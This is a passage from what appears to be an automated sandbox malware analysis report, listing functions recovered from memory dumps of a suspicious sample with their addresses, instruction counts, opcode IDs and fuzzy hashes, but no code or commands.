                                                                                      • Opcode Fuzzy Hash: 4baf4b1be4bdb692a7f7a5e968b7d18b4c5d88363c5ecac3d8b24ecffa76977d
                                                                                      • Instruction Fuzzy Hash: 6CB01210E080198DE3609B54881037C90A0EF2C300F5110F2C02DE31C3EF281D005600
                                                                                      Function 00007FFD9B8630A0 Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000036.00000002.2388485962.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_54_2_7ffd9b860000_RuntimeBroker.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction ID: ba8ae787f1ac31e28f55b300a88cdd0b4f0074860b82cb489537b29e945e33db
                                                                                      • Opcode Fuzzy Hash: 49a013b6b0d9c2700980600510b396546e3a2fc01e3d891a89915a86f1a37ee5
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Executed Functions

                                                                                      Function 00007FFD9B88E5B5 Relevance: .4, Instructions: 447COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: efe2b9977143490595ac7a8c60f16f566d14332673ce231a5fb6085849cab868
                                                                                      • Instruction ID: 3340fdb382f59fa8b87d45dd227b4a129be11a30c1a1a2143d02c0f373a3143d
                                                                                      • Opcode Fuzzy Hash: efe2b9977143490595ac7a8c60f16f566d14332673ce231a5fb6085849cab868
                                                                                      • Instruction Fuzzy Hash: EFC1F021B2EA9E0BE32D8B684C520B537D1EBD6306F19867DD4E7C3957E938E90342C1
                                                                                      Function 00007FFD9B861698 Relevance: .3, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 604464dd4e76fa0d768a562d7a11a06cd01b131a17fcc7e6c69545ad0cfa3dda
                                                                                      • Instruction ID: 7315063db6108dab3a0d4260b1c1554906b21dd9d675af61d8737b8a0d7d1512
                                                                                      • Opcode Fuzzy Hash: 604464dd4e76fa0d768a562d7a11a06cd01b131a17fcc7e6c69545ad0cfa3dda
                                                                                      • Instruction Fuzzy Hash: 4C91F371A19A8D8FE789DB68C8797E97BE0FF59300F4401BAD049C76E6DFB868018741
                                                                                      Function 00007FFD9B871081 Relevance: 2.4, Strings: 1, Instructions: 1128COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: K@N_^
                                                                                      • API String ID: 0-813202305
                                                                                      • Opcode ID: 354a05ca828e56bb85f0c2cbc0e6da22ecabd468aaa7b818f8d0c8099fed2b80
                                                                                      • Instruction ID: 53db810b075709bcd93b280a8401856d42732ae6af7227a867898cd0aa324ca0
                                                                                      • Opcode Fuzzy Hash: 354a05ca828e56bb85f0c2cbc0e6da22ecabd468aaa7b818f8d0c8099fed2b80
                                                                                      • Instruction Fuzzy Hash: 8C82C531B1D90E8FEBA8EB5888A16B97392FF9C340F5541B9D01DC369BDD38B9418781
                                                                                      Function 00007FFD9B88F4D9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 0d8ba757c2628b6b91c57c22c6d1c40d243dae4930081c1a03c19baabebcd272
                                                                                      • Instruction ID: 70b7336771b7efa7a87e33e10e594cb8a7aedec92e5f26ff48a88e3d8298e932
                                                                                      • Opcode Fuzzy Hash: 0d8ba757c2628b6b91c57c22c6d1c40d243dae4930081c1a03c19baabebcd272
                                                                                      • Instruction Fuzzy Hash: 4CF0E57160F3C04FCB169B7488688147F60EF2721074A42EFC045CF1A3EA2DC885C701
                                                                                      Function 00007FFD9B885539 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 7362a34877f85833d27003df65289cd69932fa28452b69de8a55c47c2cb49998
                                                                                      • Instruction ID: cb9095121b5d93adac8b8e7c08ed4e9df460a25d7a6876dfbcfe6e7fd51fcb49
                                                                                      • Opcode Fuzzy Hash: 7362a34877f85833d27003df65289cd69932fa28452b69de8a55c47c2cb49998
                                                                                      • Instruction Fuzzy Hash: 61F0E57164F3C04FCB169A3488688487F61EF2720074A42EFC046CF2E3EA2CC885C701
                                                                                      Function 00007FFD9B8891C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 09337b69920a4e559365c46de931fa39e7f374dd983a40d206a49cd9ccb7b8da
                                                                                      • Instruction ID: 2145db0d15d1098a4f58589afae54c46533c5ca2d95cc2eef0ba05d6a19b1d48
                                                                                      • Opcode Fuzzy Hash: 09337b69920a4e559365c46de931fa39e7f374dd983a40d206a49cd9ccb7b8da
                                                                                      • Instruction Fuzzy Hash: FEE0127154F7D44FCB169B7488698443F70EE6725074A41DEC155CF1F3E62D994AC701
                                                                                      Function 00007FFD9B88ED79 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: M
                                                                                      • API String ID: 0-3664761504
                                                                                      • Opcode ID: 466d39b98c4c8725c4ae3a81340d0dd517893926c08a58e50904aec51a1d30b0
                                                                                      • Instruction ID: 8b48e62f7c9ccf1630e314f205331b9a9f82daef2017b5a16f22082f0a6da811
                                                                                      • Opcode Fuzzy Hash: 466d39b98c4c8725c4ae3a81340d0dd517893926c08a58e50904aec51a1d30b0
                                                                                      • Instruction Fuzzy Hash: 02E06D71A0F7C44FC71AEA388869454BFA0EF6720174A42EEC045CF1A7EA2D9889C701
                                                                                      Function 00007FFD9B88F569 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 7a43bbb3a3c26a5bb1f424cba3d4d45f931e1d1a56bb9000aa3f52fa8b08b1ec
                                                                                      • Instruction ID: 4222e7016efe7529e8133d5d8569d1499bb5de00815003ccd730b79e4221560f
                                                                                      • Opcode Fuzzy Hash: 7a43bbb3a3c26a5bb1f424cba3d4d45f931e1d1a56bb9000aa3f52fa8b08b1ec
                                                                                      • Instruction Fuzzy Hash: 13E09A7194B3D54FCB0AEB74886AC443FA0EE2B21078A41EEC045CF1B3E62DC84AC700
                                                                                      Function 00007FFD9B88E549 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: d204cbc0337789a66bfe9dab47939a7f8815904f5f0ea2b407440d012ce8ac05
                                                                                      • Instruction ID: ee18a437480cae6503b1859921c7d18d199e40583c46c14a9560769c67a6704c
                                                                                      • Opcode Fuzzy Hash: d204cbc0337789a66bfe9dab47939a7f8815904f5f0ea2b407440d012ce8ac05
                                                                                      • Instruction Fuzzy Hash: 98E06D6154F7D44FCB069B7488658143FA0AE2724074A41DEC085CF1B3E62CC949C711
                                                                                      Function 00007FFD9B889019 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: I
                                                                                      • API String ID: 0-3707901625
                                                                                      • Opcode ID: 311d8f3c6f6d538552b079fb6f105a56d8a5c45e18ac024f7a82b70a615bb2e2
                                                                                      • Instruction ID: 4c4cb40a63ac3c9e644f31df5dc949e70e8c28fd0c5443785105dd8288516545
                                                                                      • Opcode Fuzzy Hash: 311d8f3c6f6d538552b079fb6f105a56d8a5c45e18ac024f7a82b70a615bb2e2
                                                                                      • Instruction Fuzzy Hash: DBE01A6254E7D44FCB16EB7488698457FA0AE6B31078B40EEC185CF1B3E62D8849C701
                                                                                      Function 00007FFD9B860A19 Relevance: .3, Instructions: 283COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction ID: 6aa88c535c39f9f393c4a70182a70fe5711e36f0a3d54dfeae81c347cd0240d2
                                                                                      • Opcode Fuzzy Hash: 564f4423bb34da6f2c71a19c4cc0d95b9fd2b8f55da1d00d2e7409bac4534587
                                                                                      • Instruction Fuzzy Hash: F4712511B2EA4E4EE768667808A52B976C2DF89B55F66023DD0CFC32E7ED1C69034245
                                                                                      Function 00007FFD9B889220 Relevance: .2, Instructions: 235COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29105f04df77e1c50207e89a115b99bf06b87eb7bbcfe4363f026a652e79ad26
                                                                                      • Instruction ID: a2ef5a8e27240dee55aa97b5e1b09c3c03f45925dcbff106dfdd007cee44aad9
                                                                                      • Opcode Fuzzy Hash: 29105f04df77e1c50207e89a115b99bf06b87eb7bbcfe4363f026a652e79ad26
                                                                                      • Instruction Fuzzy Hash: 5F718231B1880E8FDB94EB68C465AA977E2FF9C300F510579D12EC76D6DF38A9418741
                                                                                      Function 00007FFD9B8726D5 Relevance: .2, Instructions: 186COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 07e3a912d12e7670efb8d5ed545a3a361be27eed2047844ae41b78256fac2ee8
                                                                                      • Instruction ID: 754653e267bc06075d037bbffcbc8797facd2ec8f823f8bf2b5f839353826467
                                                                                      • Opcode Fuzzy Hash: 07e3a912d12e7670efb8d5ed545a3a361be27eed2047844ae41b78256fac2ee8
                                                                                      • Instruction Fuzzy Hash: F251F762B1E9494FF7A9EBAC48B6B7822C2EB9E354F0501B5D41DC32EBDD28A9414341
                                                                                      Function 00007FFD9B860850 Relevance: .2, Instructions: 180COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23846fda867f726084b55a6d3c8299afda0f6794e7def88452979b4bca426018
                                                                                      • Instruction ID: 8077702fbe02dd585e9a12b11baf5fb3446fe6afd4c5fd2b619547883ff3d161
                                                                                      • Opcode Fuzzy Hash: 23846fda867f726084b55a6d3c8299afda0f6794e7def88452979b4bca426018
                                                                                      • Instruction Fuzzy Hash: 0B514932F1DA5C8FD764DB7C88A46BA7BE1FF4D311B0501BAE09AC72A6DE2498018741
                                                                                      Function 00007FFD9B872507 Relevance: .2, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b870000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e2ba8c669ad7a772871a2483f192ae809f86aeb60a123566760734520c2d8c4
                                                                                      • Instruction ID: d94dd3742b34e65df1d0bfb7836af0350c511bee019ee68fa0d74170601f083a
                                                                                      • Opcode Fuzzy Hash: 9e2ba8c669ad7a772871a2483f192ae809f86aeb60a123566760734520c2d8c4
                                                                                      • Instruction Fuzzy Hash: F151D552F1EA594FF7A9EBAC48B6B7822C2EF9D744F0901B5D41CC32DBDD28A9414342
                                                                                      Function 00007FFD9B8607D3 Relevance: .1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b59a2c78ddd90aec4ff13fde7b26063b4771e4fb9b0575d8501f113ab817de4a
                                                                                      • Instruction ID: 17ce93ac8d2b87679d5af1b8930800711612314e3dbc8f3d1104a06441ea822b
                                                                                      • Opcode Fuzzy Hash: b59a2c78ddd90aec4ff13fde7b26063b4771e4fb9b0575d8501f113ab817de4a
                                                                                      • Instruction Fuzzy Hash: 39319C37B5D6998ED721A77CA8A50FA3FE0EF89235B0401BBD1C9CA093DD2494478295
                                                                                      Function 00007FFD9B8918F2 Relevance: .1, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f18def88af2ed0750683ff95e245efaa43eac351189aeccd2983a3046a17416a
                                                                                      • Instruction ID: b088207d5179c7a11be8d58834effdb8df5f2222c251d19c37bc1faa971fb470
                                                                                      • Opcode Fuzzy Hash: f18def88af2ed0750683ff95e245efaa43eac351189aeccd2983a3046a17416a
                                                                                      • Instruction Fuzzy Hash: 4531B556B4D5521AEB1577BCBCB64F83F51DF0223974C02F3D1DD4A0EBF988608A8686
                                                                                      Function 00007FFD9B86080D Relevance: .1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d71b924ed875bdc73fc264f879b41d70924e1afcdbc4715f539bbae424e7c9d7
                                                                                      • Instruction ID: 13a7418e60ef9d6f42f4983d12a1f15064e42098557b2472b90d184f70e4fe37
                                                                                      • Opcode Fuzzy Hash: d71b924ed875bdc73fc264f879b41d70924e1afcdbc4715f539bbae424e7c9d7
                                                                                      • Instruction Fuzzy Hash: 6F317C33B5E7984ED721A77C58A50FA3FE0EF89239B05017BE0C9CA193ED2490468295
                                                                                      Function 00007FFD9B8612B0 Relevance: .1, Instructions: 116COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3491607cec4c6d1134a60d377b51e0bc9b11b6cb18b1c29745ad01b57bb2e767
                                                                                      • Instruction ID: 6d2e03799984ab6bb652425efeb83deb399fef770564dfd761c0f1b051f1a319
                                                                                      • Opcode Fuzzy Hash: 3491607cec4c6d1134a60d377b51e0bc9b11b6cb18b1c29745ad01b57bb2e767
                                                                                      • Instruction Fuzzy Hash: 7D31F821B5CA1D4FE758B76C6866AF973C2DF8C325B4444BAE40EC32E7ED68AC414285
                                                                                      Function 00007FFD9B860820 Relevance: .1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8902600cf02781a01a43f1eb0821480710b0c6c48be56571abad48e41c32203e
                                                                                      • Instruction ID: ad71372298f4f0ae3b18aa30c61dcfcdffedf0889f0d396683cbadffedc8ce56
                                                                                      • Opcode Fuzzy Hash: 8902600cf02781a01a43f1eb0821480710b0c6c48be56571abad48e41c32203e
                                                                                      • Instruction Fuzzy Hash: B8218C33A5D7988EE721B77C58A50FA3FE0EF49239F04017BE0DACA193ED2490468795
                                                                                      Function 00007FFD9B8612E8 Relevance: .1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6a1234b9cdac01725d20fbc41257f67c6dd28d5abf225abc96b1dc0b136afc8a
                                                                                      • Instruction ID: 18ccbb66b203402606f53103e5bb616178e771dbdc4bfe6524c898264da23839
                                                                                      • Opcode Fuzzy Hash: 6a1234b9cdac01725d20fbc41257f67c6dd28d5abf225abc96b1dc0b136afc8a
                                                                                      • Instruction Fuzzy Hash: 42212B21B1991D8FE758FB6C546AA7A76C6EF8C315F8100B9E40EC32F7DC28AD418281
                                                                                      Function 00007FFD9B861575 Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 494f138bd35998b2e54362ad582fb8e409281b3e9905308206ed95df33316b4c
                                                                                      • Instruction ID: 332da5c554bb8c2033f06f3468e0063db8a42491002281ddeaed9e51674c8560
                                                                                      • Opcode Fuzzy Hash: 494f138bd35998b2e54362ad582fb8e409281b3e9905308206ed95df33316b4c
                                                                                      • Instruction Fuzzy Hash: F6210335B0964ECFE720FBA8C8656ECBBB0EF94311F5541B6C154C7193EA34A689CB40
                                                                                      Function 00007FFD9B88F243 Relevance: .1, Instructions: 74COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16d3f5a0dc47ce233f8f3bfb5b3fd4c63289f328357771eaacb031d697b0ee70
                                                                                      • Instruction ID: 6d3f5bab5fe1ebd4adc63076f866bdfbc0490d187ad9b2411be5908cac0e068b
                                                                                      • Opcode Fuzzy Hash: 16d3f5a0dc47ce233f8f3bfb5b3fd4c63289f328357771eaacb031d697b0ee70
                                                                                      • Instruction Fuzzy Hash: 9D11D221B1CA554BE728AB1CA4157B937C1EB9C718F15067DF09EC32D6CF385D42828B
                                                                                      Function 00007FFD9B88696F Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8b39a39b69b75c9e846a59089a51d67b92a337462c32462cec55d3da10b3ae1
                                                                                      • Instruction ID: b39aa03ce7aa832278898ce7e7819f72c3d2203966274f4b56a6a7189f850d1e
                                                                                      • Opcode Fuzzy Hash: d8b39a39b69b75c9e846a59089a51d67b92a337462c32462cec55d3da10b3ae1
                                                                                      • Instruction Fuzzy Hash: 8B21D0A1A4FBC51FD75357745C7A4947FB0AE1B25070E41EBC0C9CB0E3EA0C194A8362
                                                                                      Function 00007FFD9B88FC60 Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db975d6ef1f792a44a018c7b3870cfc01f311048bf431aa46f90ece432a82781
                                                                                      • Instruction ID: c2905a7c88e578d537a43d95f8b43ca44f07b35b5a152eefe960a744a0393bea
                                                                                      • Opcode Fuzzy Hash: db975d6ef1f792a44a018c7b3870cfc01f311048bf431aa46f90ece432a82781
                                                                                      • Instruction Fuzzy Hash: 43116D31E0D91A8FEB68EB58C461BB87291EB58710F1605B9D42DD32D6DA386E418B81
                                                                                      Function 00007FFD9B88F236 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B881000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B881000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b881000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 141f9077522e39bee32b513e3da6de769635a3ac3d91e71ac71127975c167ec7
                                                                                      • Instruction ID: 35018235846eda8d056f14597ebeb03d54701bde1437c75cf7ea9deddd6bbe19
                                                                                      • Opcode Fuzzy Hash: 141f9077522e39bee32b513e3da6de769635a3ac3d91e71ac71127975c167ec7
                                                                                      • Instruction Fuzzy Hash: 0C11E521F0C9664BE328AB0C94657B932C1EB9C318F15067DE0AEC32D6CF3C5D828247
                                                                                      Function 00007FFD9B861588 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction ID: 013515f410faf167bed28fd54e10c83c6a48c526ddee5f9a5c308b2eeef2b676
                                                                                      • Opcode Fuzzy Hash: 670109c2ed75a270fa84168a99d12e64013a92adf950f11aa8a82e606cf027bc
                                                                                      • Instruction Fuzzy Hash: E301C435B0964D8FDB01FBB8C4545DCBBB0EF85315F1546B6C094C7292E63497598780
                                                                                      Function 00007FFD9B862C94 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000037.00000002.2464021156.00007FFD9B860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B860000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_55_2_7ffd9b860000_USZqVcJFLA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
